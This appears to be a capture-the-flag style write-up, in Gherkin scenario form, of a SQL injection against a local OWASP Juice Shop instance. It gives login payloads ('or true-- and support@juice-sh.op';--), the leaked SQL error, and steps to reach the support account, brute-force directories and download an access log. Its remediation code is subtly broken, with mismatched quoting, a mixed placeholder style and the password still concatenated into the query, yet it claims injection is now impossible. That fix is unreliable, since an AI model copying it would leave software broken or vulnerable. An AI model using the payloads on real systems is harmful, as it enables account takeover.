## Version 1.4.1
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Injection flaws
  Location:
    /login - email (Parameter)
  CWE:
    CWE-89: SQL Injection
  Rule:
    REQ.169: https://fluidattacks.com/web/rules/169/
  Goal:
    Log in as the support team's
  Recommendation:
    Use parameterized queries


  Background:
  Hacker's software:
    | <Software name> | <Version>       |
    | Kali Linux      | 2020            |
    | Firefox Quantum | 68.7.0esr       |
    | Burpsuite       | 2020.4          |
    | DirBuster       | 1-RC1           |

  TOE information:
    Given I am running locally at
    """
    https://localhost:3000/#/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I access https://localhost:3000/#/
    Then I see the site
    And I can navigate to the login page

  Scenario: Static detection
  SQL Injection
    Given I can login into the app or register as new user
    Then I want to see if the login system is vulnerable to a sql injection
    Then I use "'or true--" as user
    And "123" as Password
    Then I'm logged in as admin
    Then I know the login system is vulnerable

  Scenario: Dynamic detection
  SQL Injection
    Given The login page https://localhost:3000/#/login
    Then I intercepted the traffic of the page using burp
    And I see the GET request when try to login with
    """
    {"email":"'","password":"asda"}
    """
    And I got
    """
    {
      "error": {
        "message": "SQLITE_ERROR: near \"adbf5a778175ee757c34d0eba4e932bc\":
        syntax error",
        "name": "SequelizeDatabaseError",
        "parent": {
          "errno": 1,
          "code": "SQLITE_ERROR",
          "sql": "SELECT * FROM Users WHERE email = ''' AND
          password = 'adbf5a778175ee757c34d0eba4e932bc' AND deletedAt IS NULL"
        },
        "original": {
          "errno": 1,
          "code": "SQLITE_ERROR",
          "sql": "SELECT * FROM Users WHERE email = ''' AND
          password = 'adbf5a778175ee757c34d0eba4e932bc' AND deletedAt IS NULL"
        },
        "sql": "SELECT * FROM Users WHERE email = '''
        AND password = 'adbf5a778175ee757c34d0eba4e932bc' AND
        deletedAt IS NULL"
      }
    }
    """
    And I can see that the email parameter is vulnerable to sql injection


  Scenario: Exploitation
  Access as Support Team
    Given I know the email parameter is vulnerable
    Then I log in with the admin account
    Then I go to the administration board
    Then I can see all the users registered in the app
    And I see the support user
    """
    User #6
    Email
    support@juice-sh.op
    Created at
    2020-07-30T16:49:00.380Z
    Updated at
    2020-07-30T21:26:45.550Z
    """
    Then I log in as support with
    """
    user: support@juice-sh.op';--
    pass: 123
    """
    And I'm logged in as Support team
    Then I try to look for any exposed file or directory
    And I use DirBuster to brute force directories and files
    Then I found an exposed Directory
    """
    http://localhost:3000/support/logs/
    """
    And I see a file
    """
    access.log.2020-07-30
    """
    And I download the file
    And I can see the access log to the app for the day
    """
    ::1 - - [30/Jul/2020:15:32:19 +0000] "GET /rest/admin/application-
    configuration HTTP/1.1" 304 - "http://localhost:3000/" "Mozilla/5.0 (X11;
    Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89
    Safari/537.36"
    ::1 - - [30/Jul/2020:15:32:19 +0000] "GET /rest/admin/application-
    version HTTP/1.1" 304 - "http://localhost:3000/" "Mozilla/5.0 (X11;
    Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89
    Safari/537.36"
    ::1 - - [30/Jul/2020:15:32:19 +0000] "GET /rest/admin/application-
    configuration HTTP/1.1" 304 - "http://localhost:3000/" "Mozilla/5.0 (X11;
    Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89
    Safari/537.36"
    """

  Scenario: Remediation
  Parameterized query
  Given I see the code at "/route/login.js"
    """
    return (req, res, next) => {
    verifyPreLoginChallenges(req)
    models.sequelize.query
    (`SELECT * FROM Users WHERE email = '${req.body.email || ''}' AND password
    = '${insecurity.hash(req.body.password || '')}' AND deletedAt IS NULL`,
    { model: models.User, plain: true })
    """
    Then I see the query to login
    Then I modified the code like this
    """
    return (req, res, next) => {
    verifyPreLoginChallenges(req)
    models.sequelize.query
    ('SELECT * FROM Users WHERE email = ? + '\' AND password= \'' +
    insecurity.hash(req.body.password || '') + '\'',
    { model: models.User, plain: true,
    replacements: { email: req.body.email } })
    """
    And In this way is not possible sql injection


  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.0/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2020-07-30
